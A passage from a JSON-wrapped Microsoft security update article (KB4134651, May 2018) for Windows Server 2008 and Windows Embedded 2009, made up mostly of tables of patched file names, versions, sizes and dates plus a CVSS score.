applicable</td></tr><tr><td>Adtschema.dll.mui</td><td>6.0.6002.24367</td><td>266,240</td><td>28-Apr-2018</td><td>03:49</td><td>Not applicable</td><td>Not applicable</td></tr><tr><td>Auditpol.exe.mui</td><td>6.0.6002.24367</td><td>32,768</td><td>28-Apr-2018</td><td>03:50</td><td>Not applicable</td><td>Not applicable</td></tr><tr><td>Msaudite.dll.mui</td><td>6.0.6002.24367</td><td>172,032</td><td>28-Apr-2018</td><td>03:51</td><td>Not applicable</td><td>Not applicable</td></tr><tr><td>Msobjs.dll.mui</td><td>6.0.6002.24367</td><td>86,016</td><td>28-Apr-2018</td><td>03:47</td><td>Not applicable</td><td>Not applicable</td></tr><tr><td>Adtschema.dll.mui</td><td>6.0.6002.24367</td><td>241,664</td><td>28-Apr-2018</td><td>03:48</td><td>Not applicable</td><td>Not applicable</td></tr><tr><td>Auditpol.exe.mui</td><td>6.0.6002.24367</td><td>32,768</td><td>28-Apr-2018</td><td>03:50</td><td>Not applicable</td><td>Not applicable</td></tr><tr><td>Msaudite.dll.mui</td><td>6.0.6002.24367</td><td>172,032</td><td>28-Apr-2018</td><td>03:50</td><td>Not applicable</td><td>Not applicable</td></tr><tr><td>Msobjs.dll.mui</td><td>6.0.6002.24367</td><td>73,728</td><td>28-Apr-2018</td><td>03:47</td><td>Not applicable</td><td>Not applicable</td></tr><tr><td>Adtschema.dll.mui</td><td>6.0.6002.24367</td><td>241,664</td><td>28-Apr-2018</td><td>03:50</td><td>Not applicable</td><td>Not applicable</td></tr><tr><td>Auditpol.exe.mui</td><td>6.0.6002.24367</td><td>28,672</td><td>28-Apr-2018</td><td>03:52</td><td>Not applicable</td><td>Not applicable</td></tr><tr><td>Msaudite.dll.mui</td><td>6.0.6002.24367</td><td>167,936</td><td>28-Apr-2018</td><td>03:52</td><td>Not applicable</td><td>Not applicable</td></tr><tr><td>Msobjs.dll.mui</td><td>6.0.6002.24367</td><td>69,632</td><td>28-Apr-2018</td><td>03:49</td><td>Not applicable</td><td>Not applicable</td></tr><tr><td>Adtschema.dll.mui</td><td>6.0.6002.24367</td><td>131,072</td><td>28-Apr-2018</td><td>03:56</td><td>Not applicable</td><td>Not 
applicable</td></tr><tr><td>Auditpol.exe.mui</td><td>6.0.6002.24367</td><td>24,576</td><td>28-Apr-2018</td><td>03:57</td><td>Not applicable</td><td>Not applicable</td></tr><tr><td>Msaudite.dll.mui</td><td>6.0.6002.24367</td><td>98,304</td><td>28-Apr-2018</td><td>03:57</td><td>Not applicable</td><td>Not applicable</td></tr><tr><td>Msobjs.dll.mui</td><td>6.0.6002.24367</td><td>40,960</td><td>28-Apr-2018</td><td>03:55</td><td>Not applicable</td><td>Not applicable</td></tr><tr><td>Adtschema.dll.mui</td><td>6.0.6002.24367</td><td>135,168</td><td>28-Apr-2018</td><td>03:54</td><td>Not applicable</td><td>Not applicable</td></tr><tr><td>Auditpol.exe.mui</td><td>6.0.6002.24367</td><td>24,576</td><td>28-Apr-2018</td><td>03:55</td><td>Not applicable</td><td>Not applicable</td></tr><tr><td>Msaudite.dll.mui</td><td>6.0.6002.24367</td><td>98,304</td><td>28-Apr-2018</td><td>03:55</td><td>Not applicable</td><td>Not applicable</td></tr><tr><td>Msobjs.dll.mui</td><td>6.0.6002.24367</td><td>45,056</td><td>28-Apr-2018</td><td>03:52</td><td>Not applicable</td><td>Not applicable</td></tr><tr><td>Adtschema.dll</td><td>6.0.6002.24367</td><td>620,544</td><td>28-Apr-2018</td><td>01:40</td><td>x86</td><td>Not applicable</td></tr><tr><td>Auditpol.exe</td><td>6.0.6002.24367</td><td>41,984</td><td>28-Apr-2018</td><td>01:43</td><td>x86</td><td>Not applicable</td></tr><tr><td>Msaudite.dll</td><td>6.0.6002.24367</td><td>146,432</td><td>28-Apr-2018</td><td>02:37</td><td>x86</td><td>Not applicable</td></tr><tr><td>Msobjs.dll</td><td>6.0.6002.24367</td><td>58,880</td><td>28-Apr-2018</td><td>02:37</td><td>x86</td><td>Not applicable</td></tr></tbody></table></td></tr></tbody></table><p><br/><strong>Windows Embedded POSReady 2009 and Windows Embedded Standard 2009 file information</strong></p><table class=\"faq-section\" faq-section=\"\"><tbody class=\"faq-panel\"><tr><td faq-panel-heading=\"\">For all supported x86-based versions</td></tr><tr><td faq-panel-body=\"\"><table 
class=\"table\"><tbody><tr><td><strong class=\"sbody-strong\">File name</strong></td><td><strong class=\"sbody-strong\">File version</strong></td><td><strong class=\"sbody-strong\">File size</strong></td><td><strong class=\"sbody-strong\">Date</strong></td><td><strong class=\"sbody-strong\">Time</strong></td><td><strong class=\"sbody-strong\">Platform</strong></td><td><strong class=\"sbody-strong\">SP requirement</strong></td><td><strong class=\"sbody-strong\">Service branch</strong></td></tr><tr><td>Kernel32.dll</td><td>5.1.2600.7475</td><td>993,792</td><td>22-Apr-2018</td><td>21:28</td><td>x86</td><td>SP3</td><td>SP3QFE</td></tr><tr><td>Ntdll.dll</td><td>5.1.2600.7475</td><td>720,384</td><td>22-Apr-2018</td><td>21:28</td><td>x86</td><td>SP3</td><td>SP3QFE</td></tr><tr><td>Ole32.dll</td><td>5.1.2600.7475</td><td>1,293,312</td><td>22-Apr-2018</td><td>06:28</td><td>x86</td><td>SP3</td><td>SP3QFE</td></tr><tr><td>Oleaut32.dll</td><td>5.1.2600.7475</td><td>546,816</td><td>22-Apr-2018</td><td>21:28</td><td>x86</td><td>SP3</td><td>SP3QFE</td></tr><tr><td>Rpcss.dll</td><td>5.1.2600.7475</td><td>401,408</td><td>22-Apr-2018</td><td>21:28</td><td>x86</td><td>SP3</td><td>SP3QFE</td></tr><tr><td>Updspapi.dll</td><td>6.3.13.0</td><td>382,840</td><td>01-Feb-2018</td><td>21:28</td><td>x86</td><td>None</td><td>Not applicable</td></tr></tbody></table></td></tr></tbody></table><p>\u00a0</p></body></html>", "edition": 2, "modified": "2018-05-08T17:09:28", "id": "KB4134651", "href": "https://support.microsoft.com/en-us/help/4134651/", "published": "2018-05-08T00:00:00", "title": "Description of the security update for vulnerabilities in Windows Server 2008, Windows Embedded POSReady 2009, and Windows Embedded Standard 2009: May 08, 2018", "type": "mskb", "cvss": {"score": 7.6, "vector": "AV:N/AC:H/Au:N/C:C/I:C/A:C"}}]}